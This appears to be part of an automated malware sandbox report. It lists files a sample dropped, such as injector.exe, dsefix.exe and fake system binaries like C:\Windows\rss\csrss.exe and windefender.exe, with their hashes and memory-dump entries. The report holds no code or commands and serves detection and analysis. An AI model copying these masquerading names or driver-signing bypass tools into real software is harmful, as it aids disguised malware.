SHA1 ef3bfab46fd137e8b780e5a85304b6c2b77e4fa9
SHA256 c53c20a0aa04606588a5630cdcb16d217227c28c7925cbc19cc70f9bf36ef9a6
SHA512 cfd07ed725ad13269cf045026b28de3aa02bbc536d2f4d13176135a037a3863036e006f89e6634760adc536e486d3b15d16d36110d928017f91b2c853503179b

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 13aaafe14eb60d6a718230e82c671d57
SHA1 e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256 f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512 ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

\Users\Admin\AppData\Local\Temp\symsrv.dll

MD5 5c399d34d8dc01741269ff1f1aca7554
SHA1 e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256 e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA512 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

\Users\Admin\AppData\Local\Temp\dbghelp.dll

MD5 f0616fa8bc54ece07e3107057f74e4db
SHA1 b33995c4f9a004b7d806c4bb36040ee844781fca
SHA256 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026
SHA512 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 86f8ccd3b15245a8d266919f58141563
SHA1 2970c6cb2d6830fe08e91a411dc45285a10c3a6c
SHA256 1c169dcc095f88004aa473f33d35ca42f1db35f4223450ae15ab35cc66528a45
SHA512 563251b004adc03b941bc11cdbea56c9b0427d40056bc12f862b9494efbec73a26d6d5fdf83d3fc68f77422e95013de8a47223cc54fc773748285ccd183cc663

memory/1424-42-0x0000000140000000-0x00000001405E8000-memory.dmp

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 7ad8463f7747aa35537f3e67de3f19f9
SHA1 cdacdb0e63e812c2b2a7f44a6c90d9c02c27e22f
SHA256 6910b05e1c3c15c85307c76cacd006ae6731dc6790e5803e954dff05c09a44e9
SHA512 721d82b5d655826c9b195d32fd14bab7ddc2e867e8c739946b3fbc15fe97c7ee31ffe3829deeb6de8c9e9001c12d58d1b0a639d3d29de5f403fb33503caec1b3

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 5fa4caf07666241990e01408a97bda20
SHA1 a594b0c51b4b452a7e1183ff414519f4252c581b
SHA256 9e1a5a680f2631d6e6d9722b43a593e3503f45bc5fd47bb8751a5426e021a68b
SHA512 4271f97232e39d7a812de4e51ab0975d451bcf0010b552d8edbf05f9b7f39fb080be97d74500f30401c5a365a1468e5c4a4ab7f6914e81620cf6fafc7fd0fef4

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 6eae804c00d4dab88686f68723f4e905
SHA1 a487f7d1be2abd884fc2cba6b6aeb3e561164949
SHA256 d83a31bd8f0c092cc847be5647ea6cf306166223538cbd509da552e5b6f8823e
SHA512 6f64c300f6aaf928eec592c41712a63b80aa951629b0f4f0d8b3af926e5164c14e37f3dcb6eff7f5d92d97bb98bf6fcefd8190a8e0d6f3ff287759977e029b4f

memory/1424-28-0x0000000140000000-0x00000001405E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\Local\Temp\Cab27BE.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\Tar293B.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

memory/2456-102-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-114-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-115-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-119-0x0000000000400000-0x0000000001E11000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 fafbf2197151d5ce947872a4b0bcbe16
SHA1 a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020
SHA256 feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71
SHA512 acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

MD5 d98e78fd57db58a11f880b45bb659767
SHA1 ab70c0d3bd9103c07632eeecee9f51d198ed0e76
SHA256 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
SHA512 aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

memory/2456-147-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-150-0x0000000000400000-0x0000000001E11000-memory.dmp

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

memory/2792-154-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/1384-157-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2792-158-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2456-159-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/1384-160-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2456-161-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-163-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/1384-164-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2456-165-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-167-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-169-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/1384-170-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2456-171-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-173-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-175-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-177-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-179-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-181-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-183-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-185-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-187-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-189-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-191-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-193-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-195-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-197-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-199-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-201-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-203-0x0000000000400000-0x0000000001E11000-memory.dmp

\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe

MD5 dcb505dc2b9d8aac05f4ca0727f5eadb
SHA1 4f633edb62de05f3d7c241c8bc19c1e0be7ced75
SHA256 61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551
SHA512 31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3

memory/2456-213-0x000000002E830000-0x000000002ED11000-memory.dmp

memory/2456-212-0x000000002E830000-0x000000002ED11000-memory.dmp

memory/2460-214-0x0000000000400000-0x00000000008E1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

MD5 3f9efb357194473cab953809b99de1d9
SHA1 965f9ca65dd4aca3c187939e517ccd0d01f4eb8c
SHA256 2a48c93f1ba620cb25bb0f525d941bfc4fee31a88c8557374c51ed371d79846c
SHA512 b4879f0b2ffc3ec4a6e882297eaa7f7b0dd638c338214a2f625265b5ca613dd7d52dba86e3de39a948acece00ff2280f5c2fc1b7f5c73b032213a3e8bbc52feb

C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

MD5 bf159166404b04a31431f2add9fd49df
SHA1 f35fe88d0d0d2126bbbffb35ea9236c315e0afe2
SHA256 5a0285bd3ec9e7bcac7519136cd4c2f4b91c57fb3dd3f20adad96d7af4f42a0c
SHA512 ee0d24f1a00c279b6832248fc1872b87985d984b6d2443e6eda4338d2f8f5cafa8952b0830ea1390f83e686c10dc81297bc0578550b62b31d256d3810c2fb590

\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

MD5 4faf9c08284389eb6da226f021f19b76
SHA1 5026cd752e9cd3d60a17ad6913d7b18f9be90376
SHA256 b1efcc45536a5e09d43a2c445b75ee2528c0592b427adf594d0c61e1a862ef76
SHA512 87ff2378c753771a9f5540073709dbd07b13934aec22a50311d3f2489bb618e3d5293b8941a57b6203b52beda091b1ae739cab3e789092b24d70fc1fb28ffbee

memory/2456-224-0x000000002E830000-0x000000002F0FD000-memory.dmp

memory/2456-225-0x000000002E830000-0x000000002F0FD000-memory.dmp

\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

MD5 432fb2f6665f966c6b0129ec895264b6
SHA1 8bb4de0b21c1dd79928ead52dbfc34299d21f33e
SHA256 16a2c0f91a4859343275e64a41740c0bbbdd214df83dd0025e2b60b59c1611cf
SHA512 d6bb283dc181e9e29ab51d32b6680d863ebf6a1a173a314fedc260f66e43ec4a84dae37ba6bf972227ec6a57249b59c8d90d27d58417ee1d3ff373f59b5ea945

memory/1028-226-0x0000000000D60000-0x000000000162D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

MD5 ca82e3b218e364eeccf166bf13897ed7
SHA1 880322058dfe59ae4058fc5046606190f601e7aa
SHA256 f783ef79561fafeee08b9544c9c784c8490a68522d567c0187095d46cb34106f
SHA512 acd01de5f587c8ed7eb993e1a23ae1f92f31ce79c518823e2d14993580df762a008c62649ac4369cbd194be28e2f7b48634f57362a547cf3fe366cc90625be8f

C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

MD5 488495d1165a23c03c96ebf36ed99965
SHA1 d12f1d61f43d64534cb1fbfd5fbda90f073b1dc7
SHA256 574aa12c0c7254003cac578ee5fe17d1879c9fc5c5957b6a46097e9fe0fd88ab
SHA512 fadf68af0eeb33acdc7db64f43a0f8da0d01a0d00b6defc8d1b3a64478de803153694753afa19d9c8eac9624e0db228f760ee5e2ff8921be5f0f2897e6910035

\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

MD5 52fabc2c588b04445c22a6e47498b361
SHA1 fe2ecbec6c5886a4a2ee24e338c22e8e78763af3
SHA256 f9dfe2b81aa7f9953857f3515253f0cb2c84607ffc57fc9e3fc11537339a9647
SHA512 ba7c033189d24609fffcfc369a136d842edc15c3cdf3fae0e135298db5d5f90a48cc26520be80ed8c7627e0fcce6c38298a799840ef003755dddfebf4021b1a5

\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

MD5 324bceacf69aa56d730beb22e55a6e69
SHA1 2b57f3f6babbf4447c599bb36c4897749e4b4aa2
SHA256 29ccc9a7cd0d0bc607474d2ba5ea6c3539759ec1a3f31e01090bab230db0d879
SHA512 1e74d6c1352c64124ff2bc6576745f96e8ea213132b04d640140ec4faf2074a03f29dc67bf36aa6103dd4dbe9ce64593d13b56a8f4d81b2254f9a61d6170bd08

memory/2456-235-0x000000002E830000-0x000000002ED18000-memory.dmp

memory/2456-236-0x000000002E830000-0x000000002ED18000-memory.dmp

memory/1948-237-0x0000000000400000-0x00000000008E8000-memory.dmp

memory/320-242-0x00000000000F0000-0x0000000000110000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe

MD5 d1a80170a9eaadd72657b982eca515bb
SHA1 64c09f7e57e9ec933e3e2dcf591ace674819fcdb
SHA256 9b9f946dca5489e5eabcfa06f9df4be8623917353b1e6f36af49f04a95ebd9c1
SHA512 ff7e83872d7bda5383b6745717a32dd7400b3c696298ae7ddc23dc9d13b592023bb731844046e7594be14d8611d1f300475caa399fddfa53b4138af100f022ca

C:\Windows\rss\csrss.exe

MD5 9f2548caa1b20ef77e2b078a721dfd19
SHA1 44f6e968ded4e3297920e14a82c8af070bd85781
SHA256 67247b6be1d682b96fd80ba4a4715169dc68bc0e2a118fd634e4b9aa20a32031
SHA512 ad84d7f367b1cb51cfa9efe5130523a3b33511f0d754e94b0c4eb13ce0dfe8293c1a7890f204931c1a08b684e3b98e4b1ba4b3d0676010ada26f3922f40dbedc

\Windows\rss\csrss.exe

MD5 eed3a4d31c5e3d45cf9ecba38c173fab
SHA1 122788bed73167c5cb5ce792f15c24f3202b8932
SHA256 2dc65422a68392cce6902cffa66d8a7ddaee844af813b65b8e3bad9d324d0297
SHA512 02121758d9745f601d56e88f5cd2289a78843bca9b2ff554bc24419d30285abd9e73f43f3c7933ca9d9d275784e3b3c7da50dae6d9cfab69c87c3a9b90d34381

memory/2060-246-0x0000000003760000-0x0000000003B58000-memory.dmp

memory/2460-245-0x0000000000400000-0x00000000008E1000-memory.dmp

\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe

MD5 68ef1fe143331e4391503dc751d0c2e2
SHA1 432dd86279a283a8899a5cffc98ff97bf5dd973b
SHA256 21d1593e1d388c6f8969f950f836eb759f4182dc0ae49e64c4e3e42dc3991a87
SHA512 7209b6bd7fda16d5b553e31b959fb40c3fbe55ffbb8acf9d17b3e1aed9181be5e91389b680e37b89d45e613af0d0063a2196756d1f7772fa5e95ad8a19302feb

memory/2060-247-0x0000000003760000-0x0000000003B58000-memory.dmp

memory/2060-248-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2060-249-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2060-250-0x0000000003760000-0x0000000003B58000-memory.dmp

memory/320-251-0x0000000000500000-0x0000000000520000-memory.dmp

memory/320-252-0x00000000005B0000-0x00000000005D0000-memory.dmp

memory/2456-253-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/1028-255-0x0000000000D60000-0x000000000162D000-memory.dmp

memory/2456-257-0x000000002E830000-0x000000002ED11000-memory.dmp

memory/2456-258-0x000000002E830000-0x000000002ED11000-memory.dmp

memory/2456-259-0x000000002E830000-0x000000002F0FD000-memory.dmp